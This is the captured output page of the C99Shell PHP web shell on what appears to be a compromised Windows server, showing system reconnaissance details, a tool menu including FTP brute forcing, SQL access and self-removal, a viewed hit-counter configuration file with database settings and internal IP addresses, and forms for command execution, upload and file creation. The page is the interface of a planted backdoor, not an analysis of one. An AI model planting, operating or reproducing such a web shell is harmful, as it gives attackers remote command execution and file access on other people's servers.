!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\xampp\xampp\htdocs\counter\   drwxrwxrwx
Free 8.81 GB of 239.26 GB (3.68%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     config.inc.php (1.08 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/* ----------------------------------------------*/
/*  PNG Counter 1.0 (PHP)                        */
/*  Copyright (c)2001 Chi Kien Uong              */
/*  URL: http://www.proxy2.de                    */
/* ----------------------------------------------*/

/* Use Database(mysql) or files to store counting */
/* execute this in your database space before using pngcounter
   CREATE TABLE counter (
   page varchar(30) NOT NULL default '',
   count bigint(20) NOT NULL default '0',
   PRIMARY KEY  (page),
   KEY fichero (page)
   ) TYPE=MyISAM;
*/
$CFG['db']       = false;    /* if false ignore 4 following fields */
$CFG['dbhost']   = "10.10.10.10:3306";   /* host:port */
$CFG['dbuser']   = "username";
$CFG['dbpasswd'] = "password";
$CFG['dbname']   = "database";

/* How many digits to show? */
$CFG['pad'] = 5;

/* Check HTTP_REFERER? */
$CFG['referer_check'] = false;
$VALID = array(
               
"http://192.168.10.3""192.168.10.2"
              
);

/* Block reloading? */
$CFG['block_ip']     = true;
$CFG['lock_timeout'] = 10// minutes

?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0312 ]--